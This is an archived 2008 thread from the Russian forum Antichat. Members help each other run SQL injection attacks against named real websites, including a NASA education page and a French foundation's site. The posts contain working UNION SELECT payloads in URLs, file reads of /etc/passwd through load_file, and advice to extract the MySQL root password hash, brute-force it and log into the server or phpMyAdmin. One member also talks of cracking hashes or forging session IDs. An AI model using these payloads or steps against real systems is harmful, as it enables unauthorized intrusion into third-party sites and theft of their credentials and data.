ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

24.05.2008, 00:02
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
у тебя file_priv нету, ибо
если в выводимое поле (любое) ввести load_file('/etc/passwd') равно как и load_file(0x2f6574632f706173737764) , то это поле просто пропадает, остальные остаются
проверить есть или нет попробовав прочитать любой файл, что ты и попробовал сделать выше
Так же инфа о наличии файл прив хранится в таблице mysql.user
Полный путь можно узнать например в гугле, вообще тут есть об этом статься от [cash]'a, ищи
В чар переводить - не сработает. Ты вместо имён таблиц увидишь "table_name"
|
|
|

24.05.2008, 00:04
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
andreipup, там двиг - ворд пресс
https://forum.antichat.ru/threadnav50572-1-40.html
|
|
|

24.05.2008, 01:35
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Так, У Велли проблема : ).Нашёл один проект,вскрыл,через schema_name узнал количество баз.Потом узнал,что на нём хостицо не один сайт  ,а когда потался вывести все те таблицы,что были в этой базе,в других базах не прокатило.).Есть ли какой-то вариант получения доступа к ним ?. о_О, и запрос если можно, как должно быть в идеале: )
Последний раз редактировалось Велемир; 24.05.2008 в 01:39..
|
|
|

24.05.2008, 01:46
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
видимо у юзера от кторого работает мускул нет прав на другие базы
если есть доступ к mysql.user, выбирай оттуда пасс рута, бруть
Когда сбрутишь или пробуй удалённо приконектиться к серваку или ищи на сайтах пшпмайадмин
|
|
|

24.05.2008, 03:25
|
|
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме: 2406659
Репутация:
34
|
|
никак не могу подобрать колонну для этой страницы
http://dragonshc.org/mx/index.php?page=-1+union+select+1,2,3,4,5,???+from+mx_page/*
|
|
|

24.05.2008, 11:14
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме: 21768337
Репутация:
3486
|
|
Сообщение от 1SeTh
никак не могу подобрать колонну для этой страницы
В чём проблема то? Вывод есть:
http://dragonshc.org/mx/index.php?page=-1+union+select+1,2,3,4,5,version()--
|
|
|

24.05.2008, 11:49
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Сообщение от Spyder
видимо у юзера от кторого работает мускул нет прав на другие базы
если есть доступ к mysql.user, выбирай оттуда пасс рута, бруть
Когда сбрутишь или пробуй удалённо приконектиться к серваку или ищи на сайтах пшпмайадмин
Жалко....доступ туда закрыт  .Остаёццо только расхешить.Ммм...Или подделать ид сессии  *Ушёл искать скрипты*.
|
|
|

24.05.2008, 13:21
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от .Slip
В чём проблема то? Вывод есть:
http://dragonshc.org/mx/index.php?page=-1+union+select+1,2,3,4,5,version()--
Вот так ещё лучше:
_http://dragonshc.org/mx/index.php?page=-1+union+select+1,concat(version(),0x3a,database(), 0x3a,user()),3,4,5,null/*
Вывод в <title> ,хотя, кому как удобнее
|
|
|

24.05.2008, 14:11
|
|
Новичок
Регистрация: 04.05.2008
Сообщений: 16
Провел на форуме: 209786
Репутация:
45
|
|
http://www.fondationbrigittebardot.fr/site/actu_en.php?id=
Нашел уязвимость...но бд ведет себя странно...
1.пробую group by , всё норм, 3 колонки...
2.пробую union select 1,2,3/* появляется ошибка...
The used SELECT statements have a different number of columns
Подскажите,плз)
|
|
|

24.05.2008, 14:49
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
http://nasaexplores.nasa.gov/show_912_teacher_st.php?id=2'+or+1=(select+table_n ame+from+information_schema.tables+limit+1,1)/*
Почему-то не эксплотируеццо,в лимитки подставляю любое число,то же самое.Что неправильно ? И вывода кстати нету)(
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|